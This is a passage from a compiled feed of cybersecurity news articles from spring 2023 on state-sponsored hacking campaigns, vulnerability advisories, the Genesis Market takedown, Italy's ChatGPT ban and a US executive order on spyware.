The all-encompassing nature of MgBot indicates that it's actively maintained and updated by the operators to obtain access to victim environments.
The disclosure arrives almost a month after SentinelOne detailed a campaign called Tainted Love in Q1 2023 aimed at telecommunication providers in the Middle East. It was attributed to a Chinese cyberespionage group that shares overlaps with Gallium (aka Othorene).
Symantec further said it identified three additional victims of the same activity cluster that are located in Asia and Africa. Two of the victims, which were breached in November 2022, are subsidiaries of a telecom firm in the Middle East region.
"Telecoms companies will always be a key target in intelligence gathering campaigns due to the access they can potentially provide to the communications of end-users," Symantec said.
Google TAG Warns of Russian Hackers Conducting Phishing Attacks in Ukraine
20.4.23 BigBrothers The Hacker News
Elite hackers associated with Russia's military intelligence service have been linked to large-volume phishing campaigns aimed at hundreds of users in Ukraine to extract intelligence and influence public discourse related to the war.
Google's Threat Analysis Group (TAG), which is monitoring the activities of the actor under the name FROZENLAKE, said the attacks continue the "group's 2022 focus on targeting webmail users in Eastern Europe."
The state-sponsored cyber actor, also tracked as APT28, Fancy Bear, Forest Blizzard, Iron Twilight, Sednit, and Sofacy, is both highly active and proficient. It has been active since at least 2009, targeting media, governments, and military entities for espionage.
The latest intrusion set, starting in early February 2023, involved the use of reflected cross-site scripting (XSS) attacks on various Ukrainian government websites to redirect users to phishing domains and capture their credentials.
The disclosure comes as U.K. and U.S. intelligence and law enforcement agencies released a joint advisory warning of APT28's attacks exploiting an old, known vulnerability in Cisco routers to deploy malware known as Jaguar Tooth.
FROZENLAKE is far from the only actor focused on Ukraine since Russia's military invasion of the country over a year ago. Another notable adversarial collective is FROZENBARENTS – aka Sandworm, Seashell Blizzard (née Iridium), or Voodoo Bear – which has engaged in a sustained effort to target organizations affiliated to the Caspian Pipeline Consortium (CPC) and other energy sector entities in Eastern Europe.
Phishing Attacks in Ukraine
Both groups have been attributed to the General Staff Main Intelligence Directorate (GRU), with APT28 tied to the 85th Special Service Center (GTsSS) military intelligence unit 26165. Sandworm, on the other hand, is believed to be part of GRU's Unit 74455.
The credential harvesting campaign targeted CPC employees with phishing links delivered via SMS. The attacks against the energy vertical distributed links to fake Windows update packages that ultimately executed an information stealer known as Rhadamanthys to exfiltrate passwords and browser cookies.
FROZENBARENTS, dubbed the "most versatile GRU cyber actor," has also been observed launching credential phishing attacks targeting the Ukrainian defense industry, military, and Ukr.net webmail users beginning in early December 2022.
The threat actor is said to have further created online personas across YouTube, Telegram, and Instagram to disseminate pro-Russian narratives, leak data stolen from compromised organizations, and post targets for distributed denial-of-service (DDoS) attacks.
"FROZENBARENTS has targeted users associated with popular channels on Telegram," TAG researcher Billy Leonard said. "Phishing campaigns delivered via email and SMS spoofed Telegram to steal credentials, sometimes targeting users following pro-Russia channels."
A third threat actor of interest is PUSHCHA (aka Ghostwriter or UNC1151), a Belarusian government-backed group that's known to act on behalf of Russian interests and which carried out targeted phishing attacks singling out Ukrainian webmail providers such as i.ua and meta.ua to siphon credentials.
Lastly, Google TAG also highlighted a set of attacks mounted by the group behind Cuba ransomware to deploy RomCom RAT in the Ukrainian government and military networks.
"This represents a large shift from this actor's traditional ransomware operations, behaving more similarly to an actor conducting operations for intelligence collection," Leonard pointed out.
The development also follows a new alert from the U.K. National Cyber Security Centre (NCSC) about emerging threats to critical national infrastructure organizations from state-aligned groups, particularly those that are "sympathetic" to Russia's invasion of Ukraine.
"These groups are not motivated by financial gain, nor subject to control by the state, and so their actions can be less predictable and their targeting broader than traditional cyber crime actors," the agency said.
Pakistani Hackers Use Linux Malware Poseidon to Target Indian Government Agencies
19.4.23 BigBrothers The Hacker News
The Pakistan-based advanced persistent threat (APT) actor known as Transparent Tribe used a two-factor authentication (2FA) tool used by Indian government agencies as a ruse to deliver a new Linux backdoor called Poseidon.
"Poseidon is a second-stage payload malware associated with Transparent Tribe," Uptycs security researcher Tejaswini Sandapolla said in a technical report published this week.
"It is a general-purpose backdoor that provides attackers with a wide range of capabilities to hijack an infected host. Its functionalities include logging keystrokes, taking screen captures, uploading and downloading files, and remotely administering the system in various ways."
Transparent Tribe is also tracked as APT36, Operation C-Major, PROJECTM, and Mythic Leopard, and has a track record of targeting Indian government organizations, military personnel, defense contractors, and educational entities.
It has also repeatedly leveraged trojanized versions of Kavach, the Indian government-mandated 2FA software, to deploy a variety of malware, such as CrimsonRAT and LimePad to harvest valuable information.
Another phishing campaign detected late last year took advantage of weaponized attachments to download malware designed to exfiltrate database files created by the Kavach app.
Linux Malware Poseidon
The latest set of attacks entail the use of a backdoored version of Kavach to target Linux users working for Indian government agencies, indicating attempts made by the threat actor to expand its attack spectrum beyond Windows and Android ecosystems.
"When a user interacts with the malicious version of Kavach, the genuine login page is displayed to distract them," Sandapolla explained. "Meanwhile, the payload is downloaded in the background, compromising the user's system."
The starting point of the infections is an ELF malware sample, a compiled Python executable that's engineered to retrieve the second-stage Poseidon payload from a remote server.
The cybersecurity firm noted that the fake Kavach apps are primarily distributed through rogue websites that are disguised as legitimate Indian government sites. This includes www.ksboard[.]in and www.rodra[.]in.
With social engineering being the primary attack vector used by Transparent Tribe, users working within the Indian government are advised to double-check URLs received in emails before opening them.
"Repercussions of this APT36 attack could be significant, leading to loss of sensitive information, compromised systems, financial losses, and reputational damage," Sandapolla said.
U.S. and U.K. Warn of Russian Hackers Exploiting Cisco Router Flaws for Espionage
19.4.23 BigBrothers The Hacker News
U.K. and U.S. cybersecurity and intelligence agencies have warned of Russian nation-state actors exploiting now-patched flaws in networking equipment from Cisco to conduct reconnaissance and deploy malware against targets.
The intrusions, per the authorities, took place in 2021 and targeted a small number of entities in Europe, U.S. government institutions, and about 250 Ukrainian victims.
The activity has been attributed to a threat actor tracked as APT28, which is also known as Fancy Bear, Forest Blizzard (formerly Strontium), FROZENLAKE, and Sofacy, and is affiliated with the Russian General Staff Main Intelligence Directorate (GRU).
"APT28 has been known to access vulnerable routers by using default and weak SNMP community strings, and by exploiting CVE-2017-6742," the National Cyber Security Centre (NCSC) said.
CVE-2017-6742 (CVSS score: 8.8) is part of a set of remote code execution flaws that stem from a buffer overflow condition in the Simple Network Management Protocol (SNMP) subsystem in Cisco IOS and IOS XE Software.
In the attacks observed by the agencies, the threat actor weaponized the vulnerability to deploy a non-persistent malware dubbed Jaguar Tooth on Cisco routers that's capable of gathering device information and enabling unauthenticated backdoor access.
While the issues were patched in June 2017, they have since come under public exploitation as of January 11, 2018, underscoring the need for robust patch management practices to limit the attack surface.
Besides updating to the latest firmware to mitigate potential threats, the company is also recommending that users switch from SNMP to NETCONF or RESTCONF for network management.
Cisco Talos, in a coordinated advisory, said the attacks are part of a broader campaign against aging networking appliances and software from a variety of vendors to "advance espionage objectives or pre-position for future destructive activity."
This includes the installation of malicious software into an infrastructure device, attempts to surveil network traffic, and attacks mounted by "adversaries with preexisting access to internal environments targeting TACACS+/RADIUS servers to obtain credentials."
The alert comes months after the U.S. government sounded the alarm about China-based state-sponsored cyber actors leveraging network vulnerabilities to exploit public and private sector organizations since at least 2020.
Then earlier this year, Google-owned Mandiant highlighted efforts undertaken by Chinese state-sponsored threat actors to deploy bespoke malware on vulnerable Fortinet and SonicWall devices.
"Advanced cyber espionage threat actors are taking advantage of any technology available to persist and traverse a target environment, especially those technologies that do not support [endpoint detection and response] solutions," Mandiant said.
Iranian Government-Backed Hackers Targeting U.S. Energy and Transit Systems
19.4.23 BigBrothers The Hacker News
An Iranian government-backed actor known as Mint Sandstorm has been linked to attacks aimed at critical infrastructure in the U.S. between late 2021 to mid-2022.
"This Mint Sandstorm subgroup is technically and operationally mature, capable of developing bespoke tooling and quickly weaponizing N-day vulnerabilities, and has demonstrated agility in its operational focus, which appears to align with Iran's national priorities," the Microsoft Threat Intelligence team said in an analysis.
Targeted entities consist of seaports, energy companies, transit systems, and a major U.S. utility and gas company. The activity is suspected to be retaliatory and in response to attacks targeting its maritime, railway, and gas station payment systems that took place between May 2020 and late 2021.
It's worth noting here that Iran subsequently accused Israel and the U.S. of masterminding the attacks on the gas stations in a bid to create unrest in the nation.
Mint Sandstorm is the new name assigned to the threat actor Microsoft was previously tracking under the name Phosphorus, and also known as APT35, Charming Kitten, ITG18, TA453, and Yellow Garuda.
The change in nomenclature is part of Microsoft's shift from chemical elements-inspired monikers to a new weather-themed threat actor naming taxonomy, in part driven by the increasing "complexity, scale, and volume of threats."
Unlike MuddyWater (aka Mercury or Mango Sandstorm), which is known to operate on behalf of Iran's Ministry of Intelligence and Security (MOIS), Mint Sandstorm is said to be associated with Islamic Revolutionary Guard Corps (IRGC).
The attacks detailed by Redmond demonstrate the adversary's ability to constantly refine its tactics as part of highly-targeted phishing campaigns to obtain access to targeted environments.
This includes rapid adoption of publicly disclosed proof-of-concepts (PoCs) linked to flaws in internet-facing applications (e.g., CVE-2022-47966 and CVE-2022-47986) into their playbooks for initial access and persistence.
A successful breach is followed by the deployment of a custom PowerShell script, which is then used to activate one of the two attack chains, the first of which relies on additional PowerShell scripts to connect to a remote server and steal Active Directory databases.
The other sequence entails the use of Impacket to connect to an actor-controlled server and deploy a bespoke implant called Drokbk and Soldier, with the latter being a multistage .NET backdoor with the ability to download and run tools and uninstall itself.
Drokbk was previously detailed by Secureworks Counter Threat Unit (CTU) in December 2022, attributing it to a threat actor known as Nemesis Kitten (aka Cobalt Mirage, TunnelVision, or UNC2448), a sub-cluster of Mint Sandstorm.
Microsoft also called out the threat actor for conducting low-volume phishing campaigns that culminate in the use of a third custom and modular backdoor referred to as CharmPower, a PowerShell-based malware that can read files, gather host information, and exfiltrate the data.
"Capabilities observed in intrusions attributed to this Mint Sandstorm subgroup are concerning as they allow operators to conceal C2 communication, persist in a compromised system, and deploy a range of post-compromise tools with varying capabilities," the tech giant added.
Pakistan-based Transparent Tribe Hackers Targeting Indian Educational Institutions
14.4.23 BigBrothers The Hacker News
The Transparent Tribe threat actor has been linked to a set of weaponized Microsoft Office documents in intrusions directed against the Indian education sector to deploy a continuously maintained piece of malware called Crimson RAT.
While the suspected Pakistan-based threat group is known to target military and government entities in the country, the activities have since expanded to include the education vertical.
The hacking group, also called APT36, Operation C-Major, PROJECTM, and Mythic Leopard, has been active as far back as 2013. Educational institutions have been at the receiving end of the adversary's attacks since late 2021.
"Crimson RAT is a consistent staple in the group's malware arsenal the adversary uses in its campaigns," SentinelOne researcher Aleksandar Milenkoski said in a report shared with The Hacker News.
The .NET malware has the functionality to exfiltrate files and system data to an actor-controlled server. It's also built with the ability to capture screenshots, terminate running processes, and download and execute additional payloads to log keystrokes and steal browser credentials.
Last month, ESET attributed Transparent Tribe to a cyber espionage campaign aimed at infecting Indian and Pakistani Android users with a backdoor called CapraRAT.
An analysis of Crimson RAT samples has revealed the presence of the word "Wibemax," corroborating a previous report from Fortinet. While the name matches that of a Pakistani software development company, it's not immediately clear if it shares any direct connection to the threat actor.
That said, it bears noting that Transparent Tribe has in the past leveraged infrastructure operated by a web hosting provider called Zain Hosting in attacks targeting the Indian education sector.
The documents analyzed by SentinelOne feature education-themed content and names like assignment or Assignment-no-10, and make use of malicious macro code to launch the Crimson RAT. Another method concerns the use of OLE embedding to stage the malware.
"Malicious documents that implement this technique require users to double-click a document element," Milenkoski explained. "These documents distributed by Transparent Tribe typically display an image (a 'View Document' graphic) indicating that the document content is locked."
This, in turn, tricks users into double-clicking the graphic to view the content, thereby activating an OLE package that stores and executes the Crimson RAT masquerading as an update process.
Crimson RAT variants have also been observed to delay their execution for a specific time period spanning anywhere between a minute and four minutes, not to mention implement different obfuscation techniques using tools like Crypto Obfuscator and Eazfuscator.
"Transparent Tribe is a highly motivated and persistent threat actor that regularly updates its malware arsenal, operational playbook, and targets," Milenkoski said. "Transparent Tribe's constantly changing operational and targeting strategies require constant vigilance to mitigate the threat posed by the group."
Estonian National Charged in U.S. for Acquiring Electronics and Metasploit Pro for Russian Military
11.4.23 BigBrothers The Hacker News
An Estonian national has been charged in the U.S. for purchasing U.S.-made electronics on behalf of the Russian government and military.
The 45-year-old individual, Andrey Shevlyakov, was arrested on March 28, 2023, in Tallinn. He has been indicted with 18 counts of conspiracy and other charges. If found guilty, he faces up to 20 years in prison.
Court documents allege that Shevlyakov operated front companies that were used to import sensitive electronics from U.S. manufacturers. The goods were then shipped to Russia, bypassing export restrictions.
The purchased items included analog-to-digital converters and low-noise pre-scalers and synthesizers that are found in defense systems. Shevlyakov is also accused of attempting to acquire hacking tools like Rapid7 Metasploit Pro, a legitimate penetration testing and adversary simulation software.
Although Shevlyakov was placed in Entity List in 2012 by the U.S. government for acting as a procurement agent for Russia, he is said to have used "false names and a web of front companies" to sidestep the regulations and run an "intricate logistics operation involving frequent smuggling trips across the Russian border."
Shevlyakov is estimated to have exported at least $800,000 worth of items from U.S. electronics manufacturers and distributors between about October 2012 and January 2022 through his shell companies like Yaxart, Anmarna, and Marnik.
"As alleged, for more than a decade, the defendant has been acquiring sensitive electronics from U.S. manufacturers on behalf of the Russian government, in defiance of U.S. export controls," U.S. Attorney Breon Peace said.
CISA Warns of 5 Actively Exploited Security Flaws: Urgent Action Required
11.4.23 BigBrothers The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added five security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild.
This includes three high-severity flaws in the Veritas Backup Exec Agent software (CVE-2021-27876, CVE-2021-27877, and CVE-2021-27878) that could lead to the execution of privileged commands on the underlying system. The flaws were fixed in a patch released by Veritas in March 2021.
CVE-2021-27876 (CVSS score: 8.1) - Veritas Backup Exec Agent File Access Vulnerability
CVE-2021-27877 (CVSS score: 8.2) - Veritas Backup Exec Agent Improper Authentication Vulnerability
CVE-2021-27878 (CVSS score: 8.8) - Veritas Backup Exec Agent Command Execution Vulnerability
Google-owned Mandiant, in a report published last week, revealed that an affiliate associated with the BlackCat (aka ALPHV and Noberus) ransomware operation is targeting publicly exposed Veritas Backup Exec installations to gain initial access by leveraging the aforementioned three bugs.
The threat intelligence firm, which is tracking the affiliate actor under its uncategorized moniker UNC4466, said it first observed exploitation of the flaws in the wild on October 22, 2022.
In one incident detailed by Mandiant, UNC4466 gained access to an internet-exposed Windows server, followed by carrying out a series of actions that allowed the attacker to deploy the Rust-based ransomware payload, but not before conducting reconnaissance, escalating privileges, and disabling Microsoft Defender's real-time monitoring capability.
Also added by CISA to the KEV catalog is CVE-2019-1388 (CVSS score: 7.8), a privilege escalation flaw impacting Microsoft Windows Certificate Dialog that could be exploited to run processes with elevated permissions on an already compromised host.
The fifth vulnerability included in the list is an information disclosure flaw in Arm Mali GPU Kernel Driver (CVE-2023-26083) that was revealed by Google's Threat Analysis Group (TAG) last month as abused by an unnamed spyware vendor as part of an exploit chain to break into Samsung's Android smartphones.
Federal Civilian Executive Branch (FCEB) agencies have time till April 28, 2023, to apply the patches to secure their networks against potential threats.
The advisory also comes as Apple released updates for iOS, iPadOS, macOS, and Safari web browser to address a pair of zero-day flaws (CVE-2023-28205 and CVE-2023-28206) that it said has been exploited in real-world attacks.
Update:#
CISA, on April 10, 2023, added the two Apple zero-day vulnerabilities to the KEV catalog, urging FCEB agencies to secure iOS, iPadOS, and macOS devices by May 1, 2023.
Iran-Based Hackers Caught Carrying Out Destructive Attacks Under Ransomware Guise
8.4.23 BigBrothers The Hacker News
The Iranian nation-state group known as MuddyWater has been observed carrying out destructive attacks on hybrid environments under the guise of a ransomware operation.
That's according to new findings from the Microsoft Threat Intelligence team, which discovered the threat actor targeting both on-premises and cloud infrastructures in partnership with another emerging activity cluster dubbed DEV-1084.
"While the threat actors attempted to masquerade the activity as a standard ransomware campaign, the unrecoverable actions show destruction and disruption were the ultimate goals of the operation," the tech giant revealed Friday.
MuddyWater is the name assigned to an Iran-based actor that the U.S. government has publicly connected to the country's Ministry of Intelligence and Security (MOIS). It's been known to be active since at least 2017.
It's also tracked by the cybersecurity community under various names, including Boggy Serpens, Cobalt Ulster, Earth Vetala, ITG17, Mercury, Seedworm, Static Kitten, TEMP.Zagros, and Yellow Nix.
Attacks mounted by the group have primarily singled out Middle Eastern nations, with intrusions observed over the past year leveraging the Log4Shell flaw to breach Israeli entities.
The latest findings from Microsoft reveal the threat actor probably worked together with DEV-1084 to pull off the attack, the latter of which conducted the destructive actions after MuddyWater successfully gained a foothold onto the target environment.
"Mercury likely exploited known vulnerabilities in unpatched applications for initial access before handing off access to DEV-1084 to perform extensive reconnaissance and discovery, establish persistence, and move laterally throughout the network, oftentimes waiting weeks and sometimes months before progressing to the next stage," Microsoft said.
In the activity detected by Redmond, DEV-1084 subsequently abused highly privileged compromised credentials to perform encryption of on-premise devices and large-scale deletion of cloud resources, including server farms, virtual machines, storage accounts, and virtual networks.
Furthermore, the threat actors gained full access to email inboxes through Exchange Web Services, using it to perform "thousands of search activities" and impersonate an unnamed high-ranking employee to send messages to both internal and external recipients.
All these actions are actions are estimated to have transpired over a roughly three-hour timeframe starting at 12:38 a.m. (when the attacker logged into the Microsoft Azure environment via compromised credentials) and ending at 3:21 a.m. (when the attacker sent emails to other parties after the successful cloud disruption).
It's worth noting here that DEV-1084 refers to the same threat actor that assumed the "DarkBit" persona as part of a ransomware and extortion attack aimed at Technion, a leading research university in Israel, in February. The Israel National Cyber Directorate, last month, attributed the attack to MuddyWater.
"DEV-1084 [...] presented itself as a criminal actor interested in extortion, likely as an attempt to obfuscate Iran's link to and strategic motivation for the attack," Microsoft added.
The links between Mercury and DEV-1084 originate from infrastructure, IP address, and tooling overlaps, with the latter observed using a reverse tunneling utility called Ligolo, a staple MuddyWater artifact.
That said, there is not ample evidence to determine if DEV-1084 operates independently of MuddyWater and collaborates with other Iranian actors, or if it's a sub-team that's only summoned when there is a need to conduct a destructive attack.
Cisco Talos, early last year, described MuddyWater as a "conglomerate" comprising several smaller clusters rather than a single, cohesive group. The emergence of DEV-1084 suggests a nod in this direction.
"While these teams seem to operate independently, they are all motivated by the same factors that align with Iranian national security objectives, including espionage, intellectual theft, and destructive or disruptive operations based on the victims they target," Talos noted in March 2022.
FBI Cracks Down on Genesis Market: 119 Arrested in Cybercrime Crackdown
6.4.23 BigBrothers The Hacker News
A coordinated international law enforcement operation has dismantled Genesis Market, an illegal online marketplace that specialized in the sale of stolen credentials associated with email, bank accounts, and social media platforms.
Coinciding with the infrastructure seizure, the major crackdown, which involved authorities from 17 countries, culminated in 119 arrests and 208 property searches in 13 nations. However, the .onion mirror of the market appears to be still up and running.
The "unprecedented" law enforcement exercise has been codenamed Operation Cookie Monster.
Genesis Market, since its inception in March 2018, evolved into a major hub for criminal activities, offering access to data stolen from over 1.5 million compromised computers across the world totaling more than 80 million credentials.
A majority of infections associated with Genesis Market related malware have been detected in the U.S., Mexico, Germany, Turkey, Sweden, Italy, France, Spain, Poland, Ukraine, Saudi Arabia, India, Pakistan, and Indonesia, among others, per data gathered by Trellix.
Some of the prominent malware families that were leveraged to compromise victims encompass AZORult, Raccoon, RedLine, and DanaBot, which are all capable of stealing sensitive information from users' systems. Also delivered through DanaBot is a rogue Chrome extension designed to siphon browser data.
"Account access credentials advertised for sale on Genesis Market included those connected to the financial sector, critical infrastructure, and federal, state, and local government agencies," the U.S. Department of Justice (DoJ) said in a statement.
The DoJ called Genesis Market one of the "most prolific initial access brokers (IABs) in the cybercrime world." The U.S. Treasury Department, in a coordinated announcement, sanctioned the criminal shop, describing it as a "key resource" used by threat actors to target U.S. government organizations.
Besides credentials, Genesis also peddled device fingerprints – which include unique identifiers and browser cookies – so as to help threat actors circumvent anti-fraud detection systems used by many websites.
"The combination of stolen access credentials, fingerprints, and cookies allowed purchasers to assume the identity of the victim by tricking third party websites into thinking the Genesis Market user was the actual owner of the account," the DoJ added.
Court documents reveal that the U.S. Federal Bureau of Investigation (FBI) gained access to Genesis Market's backend servers twice in December 2020 and May 2022, enabling the agency to access information pertaining to about 59,000 users of the cybercrime bazaar.
The packages of stolen information harvested from infected computers (aka "bots") were sold for anywhere between $0.70 to several hundreds of dollars depending on the nature of the data, according to Europol and Eurojust.
"The most expensive would contain financial information which would allow access to online banking accounts," Europol noted, stating the criminals purchasing the data were also provided with additional tools to use it without attracting attention.
"Buyers were provided with a custom browser which would mimic the one of their victim. This allowed the criminals to access their victim's account without triggering any of the security measures from the platform the account was on."
The proprietary Chromium-based browser, referred to as Genesium, is cross-platform, with the maintainers claiming features such as "anonymous surfing" and other advanced functionalities that permit its users to bypass anti-fraud systems.
Genesis Market, unlike Hydra and other illicit marketplaces, was also accessible over the clearnet, thereby lowering the barrier of entry for lesser-skilled threat actors looking to obtain digital identities in order to breach individual accounts and enterprise systems.
The takedown is expected to have a "ripple effect throughout the underground economy" as threat actors search for alternatives to fill the void left by Genesis Market.
Genesis Market is the latest in a long line of illegitimate services that have been taken down by law enforcement. It also arrives exactly a year after the dismantling of Hydra, which was felled by German authorities in April 2022 and created a "seismic shift in the Russian-language darknet marketplace landscape."
"Almost a year after Hydra's takedown, five markets — Mega, Blacksprut, Solaris, Kraken, and OMG!OMG! Market — have emerged as the biggest players based on the volume of offers and the number of sellers," Flashpoint said in a new report.
The development also follows the launch of a new dark web marketplace known as STYX that's primarily geared towards financial fraud, money laundering, and identity theft. It's said to have opened its doors around January 19, 2023.
"Some examples of the specific service offerings marketed on STYX include cash-out services, data dumps, SIM cards, DDOS, 2FA/SMS bypass, fake and stolen ID documents, banking malware, and much more," Resecurity said in a detailed writeup.
Like Genesis Market, STYX also offers utilities that are designed to get around anti-fraud solutions and access compromised accounts by using granular digital identifiers like stolen cookie files, physical device data, and network settings to spoof legitimate customer logins.
The emergence of STYX as a new platform in the commercial cybercriminal ecosystem is yet another sign that the market for illegal services continues to be a fruitful business, allowing bad actors to profit from credential theft and payment data.
"The majority of STYX Marketplace vendors specialize in fraud and money laundering services targeting popular digital banking platforms, online-marketplaces, e-commerce and other payment applications," Resecurity noted. "The geographies targeted by these threat actors are global, spanning the U.S., E.U., U.K., Canada, Australia and multiple countries in APAC and Middle East."
Google TAG Warns of North Korean-linked ARCHIPELAGO Cyberattacks
5.4.23 BigBrothers The Hacker News
A North Korean government-backed threat actor has been linked to attacks targeting government and military personnel, think tanks, policy makers, academics, and researchers in South Korea and the U.S.
Google's Threat Analysis Group (TAG) is tracking the cluster under the name ARCHIPELAGO, which it said is a subset of another threat group tracked by Mandiant under the name APT43.
The tech giant said it began monitoring the hacking crew in 2012, adding it has "observed the group target individuals with expertise in North Korea policy issues such as sanctions, human rights, and non-proliferation issues."
The priorities of APT43, and by extension ARCHIPELAGO, are said to align with North Korea's Reconnaissance General Bureau (RGB), the primary foreign intelligence service, suggesting overlaps with a group broadly known as Kimsuky.
Attack chains mounted by ARCHIPELAGO involve the use of phishing emails containing malicious links that, when clicked by the recipients, redirect to fake login pages that are designed to harvest credentials.
These messages purport to be from media outlets and think tanks and seek to entice targets under the pretext of requesting for interviews or additional information about North Korea.
"ARCHIPELAGO invests time and effort to build a rapport with targets, often corresponding with them by email over several days or weeks before finally sending a malicious link or file," TAG said.
The threat actor is also known to employ the browser-in-the-browser (BitB) technique to render rogue login pages inside an actual window to steal credentials.
What's more, the phishing messages have posed as Google account security alerts to activate the infection, with the adversarial collective hosting malware payloads like BabyShark on Google Drive in the form of blank files or ISO optical disc images.
Another notable technique adopted by ARCHIPELAGO is the use of fraudulent Google Chrome extensions to harvest sensitive data, as evidenced in prior campaigns dubbed Stolen Pencil and SharpTongue.
The development comes as AhnLab Security Emergency Response Center (ASEC) detailed Kimsuky's use of Alternate Data Stream (ADS) and weaponized Microsoft Word files to deliver info-stealer malware.
Italian Watchdog Bans OpenAI's ChatGPT Over Data Protection Concerns
4.4.23 BigBrothers The Hacker News
The Italian data protection watchdog, Garante per la Protezione dei Dati Personali (aka Garante), has imposed a temporary ban of OpenAI's ChatGPT service in the country, citing data protection concerns.
To that end, it has ordered the company to stop processing users' data with immediate effect, stating it intends to investigate the company over whether it's unlawfully processing such data in violation of the E.U. General Data Protection Regulation (GDPR) laws.
"No information is provided to users and data subjects whose data are collected by Open AI," the Garante noted. "More importantly, there appears to be no legal basis underpinning the massive collection and processing of personal data in order to 'train' the algorithms on which the platform relies."
ChatGPT, which is estimated to have reached over 100 million monthly active users since its release late last year, has not disclosed what it used to train its latest large language model (LLM), GPT-4, or how it trained it.
That said, its predecessor GPT-3 utilizes text sourced from books, Wikipedia, and Common Crawl, the latter of which maintains an "open repository of web crawl data that can be accessed and analyzed by anyone."
The Garante also pointed to the lack of any age verification system to prevent minors from accessing the service, potentially exposing them to "inappropriate" responses. Google's own chatbot, called Bard, is only open to users over the age of 18.
Additionally, the regulator raised questions about the accuracy of the information surfaced by ChatGPT, while also highlighting a data breach the service suffered earlier last month that exposed some users' chat titles and payment-related information.
In response to the order, OpenAI has blocked its generative AI chatbot from being accessed by users with an Italian IP address. It also said it's issuing refunds to subscribers of ChatGPT Plus, in addition to pausing subscription renewals.
The San Francisco-based company further emphasized that it provides ChatGPT in compliance with GDPR and other privacy laws. ChatGPT is already blocked in China, Iran, North Korea, and Russia.
In a statement shared with Reuters, OpenAI said it actively works to "reduce personal data in training our AI systems like ChatGPT because we want our AI to learn about the world, not about private individuals."
OpenAI has 20 days to notify the Garante of the measures it has taken to bring it in compliance, or risk facing fines of up to €20 million or 4% of the total worldwide annual turnover, whichever is higher.
The ban, however, is not expected to impact applications from other companies that employ OpenAI's technology to augment their services, including Microsoft's Bing search engine and its Copilot offerings.
The development also comes as Europol warned that LLMs like ChatGPT are likely to help generate malicious code, facilitate fraud, and "offer criminals new opportunities, especially for crimes involving social engineering, given its abilities to respond to messages in context and adopt a specific writing style."
This is not the first time AI-focused companies have come under the radar. Last year, controversial facial recognition firm Clearview AI was fined by multiple European regulators for scraping users' publicly available photos without consent to train its identity-matching service.
It has also run afoul of privacy laws in Australia, Canada, and the U.S., with several countries ordering the company to delete all of the data it obtained in such a manner.
Clearview AI told the BBC News last week that it has run nearly a million searches for U.S. law enforcement agencies, despite being permanently banned from selling its faceprint database within the country.
Pakistan-Origin SideCopy Linked to New Cyberattack on India's Ministry of Defence
28.3.23 BigBrothers The Hacker News
An advanced persistent threat (APT) group that has a track record of targeting India and Afghanistan has been linked to a new phishing campaign that delivers Action RAT.
According to Cyble, which attributed the operation to SideCopy, the activity cluster is designed to target the Defence Research and Development Organization (DRDO), the research and development wing of India's Ministry of Defence.
Known for emulating the infection chains associated with SideWinder to deliver its own malware, SideCopy is a threat group of Pakistani origin that shares overlaps with Transparent Tribe. It has been active since at least 2019.
Attack chains mounted by the group involve using spear-phishing emails to gain initial access. These messages come bearing a ZIP archive file that contains a Windows shortcut file (.LNK) masquerading as information about the K-4 ballistic missile developed by DRDO.
Executing the .LNK file leads to the retrieval of an HTML application from a remote server, which, in turn, displays a decoy presentation, while also stealthily deploying the Action RAT backdoor.
The malware, in addition to gathering information about the victim machine, is capable of running commands sent from a command-and-control (C2) server, including harvesting files and dropping follow-on malware.
Also deployed is a new information-stealing malware referred to as AuTo Stealer that's equipped to gather and exfiltrate Microsoft Office files, PDF documents, database and text files, and images over HTTP or TCP.
"The APT group continuously evolves its techniques while incorporating new tools into its arsenal," Cyble noted.
This is not the first time SideCopy has employed Action RAT in its attacks directed against India. In December 2021, Malwarebytes disclosed a set of intrusions that breached a number of ministries in Afghanistan and a shared government computer in India to steal sensitive credentials.
The latest findings arrive a month after the adversarial crew was spotted targeting Indian government agencies with a remote access trojan dubbed ReverseRAT.
President Biden Signs Executive Order Restricting Use of Commercial Spyware
28.3.23 BigBrothers The Hacker News
U.S. President Joe Biden on Monday signed an executive order that restricts the use of commercial spyware by federal government agencies.
The order said the spyware ecosystem "poses significant counterintelligence or security risks to the United States Government or significant risks of improper use by a foreign government or foreign person."
It also seeks to ensure that the government's use of such tools is done in a manner that's "consistent with respect for the rule of law, human rights, and democratic norms and values."
To that end, the order lays out the various criteria under which commercial spyware could be disqualified for use by U.S. government agencies. They include -
The purchase of commercial spyware by a foreign government or person to target the U.S. government,
A commercial spyware vendor that uses or discloses sensitive data obtained from the cyber surveillance tool without authorization and operates under the control of a foreign government that's engaged in espionage activities aimed at the U.S.,
A foreign threat actor that uses commercial spyware against activists and dissidents with the goal of limiting freedom of expression or perpetrating human rights abuses,
A foreign threat actor that uses commercial spyware to keep tabs on a U.S. citizen without legal authorization, safeguards, and oversight, and
The sales of commercial spyware to governments that have a record of engaging in systematic acts of political repression and other human rights violations.
"This Executive Order will also serve as a foundation to deepen international cooperation to promote responsible use of surveillance technology, counter the proliferation and misuse of such technology, and spur industry reform," the White House said in a statement.
About 50 U.S. government officials in senior positions located in at least 10 countries are estimated to have been infected or targeted by such spyware to date, the Wall Street Journal reported, a number larger than previously known.
While the order stops short of an outright ban, the development comes as sophisticated and invasive surveillance tools are being increasingly deployed to access electronic devices remotely using zero-click exploits and extract valuable information about targets without their knowledge or consent.
Last week, the New York Times reported that Artemis Seaford, a former security policy manager at Meta, had her phone wiretapped and hacked by Greece's national intelligence agency using Predator, a spyware developed by Cytrox.
That said, the order also leaves open the possibility of other kinds of spyware devices, including IMSI catchers, being used by government agencies to glean valuable intelligence.
Viewed in that light, it's also an acknowledgment that the spyware-for-sale industry plays an important role in intelligence-gathering operations even as the technology constitutes a growing counterintelligence and national security risk to government personnel.
Earlier this month, the Federal Bureau of Investigation (FBI) confirmed that the agency has in the past purchased the location data of U.S. citizens from data brokers as a means to sidestep the traditional warrant process.
The FBI is also alleged to have bought a license for Israeli company NSO Group's Pegasus during 2020 and 2021, acknowledging that it was used for research and development purposes.
The Drug Enforcement Administration (DEA), in a similar fashion, uses Graphite, a spyware tool produced by another Israeli company named Paragon, for counternarcotics operations. It's not immediately not clear if other U.S. federal agencies currently use any commercial spyware.
Microsoft Warns of Stealthy Outlook Vulnerability Exploited by Russian Hackers
25.3.23 BigBrothers The Hacker News
